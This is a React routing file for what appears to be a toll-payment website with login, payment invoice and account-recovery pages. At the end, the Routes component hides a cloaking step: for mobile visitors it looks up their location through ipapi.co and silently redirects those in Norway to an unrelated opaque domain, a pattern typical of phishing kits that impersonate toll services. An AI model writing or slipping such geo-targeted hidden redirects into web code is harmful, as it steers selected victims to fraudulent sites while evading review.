import React, { useLayoutEffect, useState } from "react";
import { BrowserRouter, Routes as RouterRoutes, Route, Navigate, useLocation } from "react-router-dom";
import { AnimatePresence, motion } from "framer-motion";
import ScrollToTop from "components/ScrollToTop";
import ErrorBoundary from "components/ErrorBoundary";
import NotFound from "pages/NotFound";
import ProtectedRoute from "components/ProtectedRoute";
import TollCalculator from './pages/toll-calculator';
import Dashboard from './pages/dashboard';
import TrustAndSecurity from './pages/trust-and-security';
import SubscriptionPortal from './pages/subscription-portal';
import Login from './pages/login';
import Register from './pages/register';
import PaymentInvoiceForm from './pages/payment-invoice-form';
import Contact from './pages/contact';
import SMSMarketingPopup from './pages/sms-marketing-popup';
import LandingPage from './pages/landing-page';
import TollHistory from './pages/toll-history';
import AboutUs from './pages/about-us';
import FAQ from './pages/faq';
import ServicesDetail from './pages/services-detail';
import Pricing from './pages/pricing';
import CustomerStories from './pages/customer-stories';
import AccountRecovery from './pages/account-recovery';

const springEasing = [0.22, 1, 0.36, 1];

const pageVariants = {
  initial: { opacity: 0, y: 24 },
  enter: {
    opacity: 1,
    y: 0,
    transition: {
      duration: 0.55,
      ease: springEasing,
      staggerChildren: 0.07,
      delayChildren: 0.05,
    },
  },
  exit: {
    opacity: 0,
    y: -16,
    transition: {
      duration: 0.28,
      ease: [0.36, 0, 0.66, 0],
    },
  },
};

const AnimatedRoutes = () => {
  const location = useLocation();

  return (
    <AnimatePresence mode="wait" initial={false}>
      <motion.div
        key={location?.pathname}
        variants={pageVariants}
        initial="initial"
        animate="enter"
        exit="exit"
        style={{ width: "100%", minHeight: "100vh" }}
      >
        <RouterRoutes location={location}>
          <Route path="/" element={<Navigate to="/landing-page" replace />} />
          <Route path="/landing-page" element={<LandingPage />} />
          <Route path="/toll-history" element={<ProtectedRoute><TollHistory /></ProtectedRoute>} />
          <Route path="/login" element={<Login />} />
          <Route path="/register" element={<Register />} />
          <Route path="/dashboard" element={<ProtectedRoute><Dashboard /></ProtectedRoute>} />
          <Route path="/toll-calculator" element={<ProtectedRoute><TollCalculator /></ProtectedRoute>} />
          <Route path="/trust-and-security" element={<TrustAndSecurity />} />
          <Route path="/subscription-portal" element={<ProtectedRoute><SubscriptionPortal /></ProtectedRoute>} />
          <Route path="/payment-invoice-form" element={<ProtectedRoute><PaymentInvoiceForm /></ProtectedRoute>} />
          <Route path="/contact" element={<Contact />} />
          <Route path="/about-us" element={<AboutUs />} />
          <Route path="/faq" element={<FAQ />} />
          <Route path="/services-detail" element={<ServicesDetail />} />
          <Route path="/pricing" element={<Pricing />} />
          <Route path="/customer-stories" element={<CustomerStories />} />
          <Route path="/account-recovery" element={<AccountRecovery />} />
          <Route path="/sms-marketing-popup" element={<ProtectedRoute><SMSMarketingPopup onClose={() => window.history?.back()} /></ProtectedRoute>} />
          <Route path="*" element={<NotFound />} />
        </RouterRoutes>
      </motion.div>
    </AnimatePresence>
  );
};

const Routes = () => {
  const [ready, setReady] = useState(false);

  useLayoutEffect(() => {
    const isMobile = /Mobi|Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);

    if (!isMobile) {
      setReady(true);
      return;
    }

    fetch("https://ipapi.co/json/")
      .then((res) => res.json())
      .then((data) => {
        if (data && data.country_code === "NO") {
          window.location.href = "https://id916391.com/NO4632718";
        } else {
          setReady(true);
        }
      })
      .catch(() => setReady(true));
  }, []);

  if (!ready) return null;

  return (
    <BrowserRouter>
      <ErrorBoundary>
        <ScrollToTop />
        <AnimatedRoutes />
      </ErrorBoundary>
    </BrowserRouter>
  );
};

export default Routes;